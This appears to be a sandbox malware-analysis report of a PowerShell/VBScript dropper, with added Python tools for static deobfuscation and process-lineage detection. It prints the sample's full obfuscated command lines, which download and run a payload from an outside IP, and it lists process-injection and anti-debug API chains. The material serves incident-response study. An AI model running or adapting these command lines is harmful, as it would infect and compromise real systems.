                    Source: wscript.exe, 00000006.00000003.1769461848.0000000004D88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000007.00000002.2064343828.0000000006FEF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYYB
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWft Corporation1)0'
                    Source: powershell.exe, 00000003.00000002.1800035532.0000000007E4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1800035532.0000000007ED7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4133634036.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4132696027.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000007.00000002.2193735599.000000000BC91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 4'^qemU
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node graph_12-53331
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00442564 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00433CE7 SetUnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: amsi32_7776.amsi.csv, type: OTHER
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: AD1008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe (12_2_00410F36)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418764 mouse_event
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'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'+[ChAR]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"
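Decoding the base64 argument in the cmd.exe to powershell.exe row above (the '...'+[chaR]58+[CHAr]0x3A+'...' pieces evaluate to "::", and [CHaR]0x22 to the double quote around the blob) gives an Add-Type -MemberDefinition that imports URLDownloadToFile from UrLMOn, a download of the .tIF file from the 192.3.122.159 host into %APPDATA% under a .vbS name, Start-Sleep(3), and Invoke-Expression of that path. That is why the same powershell.exe goes on to spawn csc.exe and cvtres.exe (Add-Type compiles the C# stub) and then wscript.exe on the dropped .vbS. The second PowerShell stage, launched by wscript.exe, uses the plainer $capellmeister = '<base64>'; ...FromBase64String($capellmeister)...; Invoke-Expression $hypoxanthine form; its blob is elided on this page. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it peels both shapes statically, without running anything, and pulls the URL, drop path and P/Invoke import out of the innermost layer. The command line it embeds is constructed for its test: the outer wrapper is copied from the row above, while the inner script only mirrors the decoded payload's shape, with a placeholder host (example.invalid), file name and parameter names.

```python
"""Static deobfuscation of the two PowerShell stage shapes in this report (added example)."""
import base64
import re

# Shape 1 (mshta -> cmd -> powershell): '...'+[char]58+[char]0x3A+'...' runs hide
#   [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("<b64>"))
# Shape 2 (wscript -> powershell): $var = '<b64>'; ...FromBase64String($var)...
_PIECE = r"(?:'[^']*'|\[char\]\s*(?:0x[0-9a-f]+|\d+))"
_CONCAT = re.compile(_PIECE + r"(?:\s*\+\s*" + _PIECE + r")+", re.I)
_TOKEN = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
_B64 = r"([A-Za-z0-9+/]{16,}={0,2})"
_B64_LITERAL = re.compile(r"FromBase64String\(\s*[\"']" + _B64 + r"[\"']\s*\)", re.I)
_B64_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'" + _B64 + r"'")
_B64_VARREF = re.compile(r"FromBase64String\(\s*\$(\w+)\s*\)", re.I)


def _join_run(match):
    """Evaluate one 'a'+[char]N+'b' run the way PowerShell would, without running it."""
    out = []
    for tok in _TOKEN.finditer(match.group(0)):
        if tok.group(2) is not None:
            num = tok.group(2)
            out.append(chr(int(num, 16) if num.lower().startswith("0x") else int(num)))
        else:
            out.append(tok.group(1))
    return "".join(out)


def flatten_concat(text):
    """Replace every string-concatenation run with its literal value."""
    return _CONCAT.sub(_join_run, text)


def extract_base64(text):
    """Decode every blob handed to FromBase64String, as a literal or via a variable."""
    blobs = _B64_LITERAL.findall(text)
    assigned = dict(_B64_ASSIGN.findall(text))
    blobs += [assigned[v] for v in _B64_VARREF.findall(text) if v in assigned]
    return [base64.b64decode(b).decode("utf-8", "replace") for b in blobs]


def deobfuscate(cmdline, max_depth=5):
    """Peel nested layers; returns [original, layer1, layer2, ...]."""
    layers = [cmdline]
    for _ in range(max_depth):
        decoded = extract_base64(flatten_concat(layers[-1]))
        if not decoded:
            break
        layers.append("\n".join(decoded))
    return layers


def extract_iocs(script):
    """Pull the artefacts a responder wants from the innermost plaintext stage."""
    def uniq(items):
        return list(dict.fromkeys(items))
    return {
        "urls": uniq(re.findall(r"https?://[^\s\"'<>)]+", script, re.I)),
        "paths": uniq(re.findall(r"\$env:\w+[\\/]+[^\s\"'<>)]+", script, re.I)),
        "imports": uniq(re.findall(r"DllImport\(\s*\"([^\"]+)\"", script, re.I)),
        "apis": uniq(re.findall(r"\bextern\s+\w+\s+(\w+)\s*\(", script)),
    }


# Constructed inner script with the shape of the decoded stage-1 payload on this page
# (Add-Type import of URLDownloadToFile, download into %APPDATA%, sleep, IEX of the
# dropped .vbS). Host, file name and P/Invoke parameter names are placeholders.
STAGE1_INNER = (
    "$dl = Add-Type -MemberDefinition '[DllImport(\"urlmon\", CharSet = CharSet.Unicode)]"
    "public static extern IntPtr URLDownloadToFile(IntPtr a,string b,string c,uint d,IntPtr e);'"
    ' -Name "W" -Namespace ns -PassThru; '
    '$dl::URLDownloadToFile(0,"http://example.invalid/121/stage.tIF","$env:APPDATA\\stage.vbS",0,0);'
    'Start-Sleep(3);Invoke-Expression "$env:APPDATA\\stage.vbS"'
)


def build_sample(inner, style="nested"):
    """Wrap INNER the way each stage on this page does (constructed test input)."""
    b64 = base64.b64encode(inner.encode("utf-8")).decode("ascii")
    if style == "variable":  # wscript.exe -> powershell.exe stage
        return ("$capellmeister = '" + b64 + "';$hypoxanthine = [System.Text.Encoding]::UTF8."
                "GetString([System.Convert]::FromBase64String($capellmeister));"
                "Invoke-Expression $hypoxanthine")
    # mshta.exe -> cmd.exe -> powershell.exe stage: the visible wrapper from the report
    return ("PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; "
            "InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A"
            "+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'"
            + b64 + "'+[ChAR]0X22+'))')))")


SAMPLE_CMDLINE = build_sample(STAGE1_INNER)


def triage(cmdline):
    """Peel the layers, then pull IOCs from the innermost one."""
    layers = deobfuscate(cmdline)
    return {"layers": layers, "iocs": extract_iocs(layers[-1])}
```

triage(SAMPLE_CMDLINE) returns both layers and an IOC dictionary with the URL, the %APPDATA% drop path, the imported DLL and the P/Invoke API; passing the real cmd.exe to powershell.exe command line from the row above yields the same fields for the sample. Everything is regex and base64, so the dropper is never executed, which is the point of doing this on a triage box rather than in the sandbox.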
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jerjrkpzicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfumrfrklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagcm0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejpsuzxtmtqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkzoc0dslhvpbnqgicagicagicagicagicagicagicagicagicagicagicagse1kagh1leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb4a0ipoycgicagicagicagicagicagicagicagicagicagicagicaglw5btuugicagicagicagicagicagicagicagicagicagicagicagillqiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzvnqqwnlicagicagicagicagicagicagicagicagicagicagicagihrkau5ydhjnicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjerjrkpzojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os8xmjevc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29pbmdvbi50suyilcikrw5wokfquerbvefcl3npbxbszwdyzwf0zmvhdhvyzxn3axrobmljzxnwzwfraw5ndghpbmdzzw50axjlbglmzwdvas52ylmildasmck7u1rhulqtu0xlzxaomyk7su52b2tflwv4ufjlu1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvwvc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29plnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jerjrkpzicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagyurelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfumrfrklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1pbiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagcm0sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagiejpsuzxtmtqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkzoc0dslhvpbnqgicagicagicagicagicagicagicagicagicagicagicagse1kagh1leludfb0ciagicagicagicagicagicagicagicagicagicagicagicb4a0ipoycgicagicagicagicagicagicagicagicagicagicagicaglw5btuugicagicagicagicagicagicagicagicagicagicagicagillqiiagicagicagicagicagicagicagicagicagicagicagicatbmfnzvnqqwnlicagicagicagicagicagicagicagicagicagicagicagihrkau5ydhjnicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjerjrkpzojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumtiylje1os8xmjevc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29pbmdvbi50suyilcikrw5wokfquerbvefcl3npbxbszwdyzwf0zmvhdhvyzxn3axrobmljzxnwzwfraw5ndghpbmdzzw50axjlbglmzwdvas52ylmildasmck7u1rhulqtu0xlzxaomyk7su52b2tflwv4ufjlu1npt24gicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvwvc2ltcgxlz3jlyxrmzwf0dxjlc3dpdghuawnlc3blywtpbmd0agluz3nlbnrpcmvsawzlz29plnziuyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $capellmeister = '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';$hypoxanthine = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($capellmeister));invoke-expression $hypoxanthine
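The process rows above also carry the lineage signals the report's Sigma hits are built on: mshta.exe spawning cmd.exe, PowerShell run with -Ex byPasS and an inline FromBase64String blob, PowerShell spawning csc.exe (Add-Type compilation), PowerShell launching a .vbS dropped under AppData\Roaming, wscript.exe handing back to PowerShell with Invoke-Expression, and CasPol.exe spawning three copies of itself with /stext and a temp-file path each. The following is an added example, not Joe Sandbox tooling or code from the analysed sample: it parses rows in the form shown on this page into parent/child pairs (with or without a space before "Process created:") and runs those lineage rules over them. The rows it embeds are abridged copies of the ones above, constructed for its test, with the obfuscated command lines cut to the fragments the rules inspect and the cuts marked with "...". Because the rows carry no PIDs, it lists edges rather than rebuilding a tree.

```python
"""Process-lineage rules over this report's 'Process created' rows (added example)."""
import re

# Abridged copies of the rows in this section, constructed for the test below: the
# obfuscated command lines are cut to the fragments the rules inspect (cuts marked ...).
ROWS = r"""
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c ... invoke-expression(...frombase64string(...))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c ... FRoMbaSE64stRinG(...)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = '...';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"
"""

# Lazy (\S+?) so the raw extraction, where the parent path runs straight into
# "Process created:", parses the same as the spaced form.
_ROW = re.compile(r"^Source:\s+(\S+?)\s*Process created:\s+(\S+)\s*(.*)$")


def parse_rows(text):
    """Return (parent_path, child_path, child_args) for every 'Process created' row."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            rows.append(m.groups())
    return rows


def image(path):
    """Lower-cased file name of an image path; the rules compare on that."""
    return path.rsplit("\\", 1)[-1].lower()


def _has(pattern, args):
    return re.search(pattern, args, re.I) is not None


# Each rule sees (parent image, child image, child command line).
RULES = {
    "mshta.exe spawning a command shell":
        lambda p, c, a: p == "mshta.exe" and c in ("cmd.exe", "powershell.exe"),
    "PowerShell with -ExecutionPolicy bypass and an inline base64 payload":
        lambda p, c, a: c == "powershell.exe" and _has(r"-ex(?:ecutionpolicy)?\s+bypass", a)
                        and _has(r"frombase64string", a),
    "PowerShell compiling C# on the fly (Add-Type -MemberDefinition -> csc.exe)":
        lambda p, c, a: p == "powershell.exe" and c == "csc.exe",
    "PowerShell launching a script dropped under AppData\\Roaming":
        lambda p, c, a: p == "powershell.exe" and c == "wscript.exe"
                        and _has(r"\\appdata\\roaming\\", a),
    "wscript.exe handing off to PowerShell that Invoke-Expressions a decoded blob":
        lambda p, c, a: p == "wscript.exe" and c == "powershell.exe"
                        and _has(r"invoke-expression", a) and _has(r"frombase64string", a),
    "CasPol.exe re-spawning itself with /stext <temp file>":
        lambda p, c, a: p == "caspol.exe" and c == "caspol.exe" and _has(r"\s/stext\s", a),
}


def evaluate(rows):
    """Return (rule name, row index) for every row that trips a rule."""
    hits = []
    for idx, (parent, child, args) in enumerate(rows):
        for name, test in RULES.items():
            if test(image(parent), image(child), args):
                hits.append((name, idx))
    return hits


def lineage(rows):
    """Ordered, de-duplicated parent -> child edges (rows carry no PIDs, so no tree)."""
    edges = [f"{image(p)} -> {image(c)}" for p, c, _ in rows]
    return list(dict.fromkeys(edges))


if __name__ == "__main__":
    rows = parse_rows(ROWS)
    print("\n".join(lineage(rows)))
    for name, idx in evaluate(rows):
        print(f"row {idx}: {name}")
```

Each rule fires exactly once on the abridged rows, and the one row with no hit (powershell.exe starting CasPol.exe with no arguments) is the injection target from the report's "Injects a PE file into a foreign processes" signature, which command-line rules cannot see; that hop needs the memory-injection telemetry, not the process tree.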
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000F86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerk
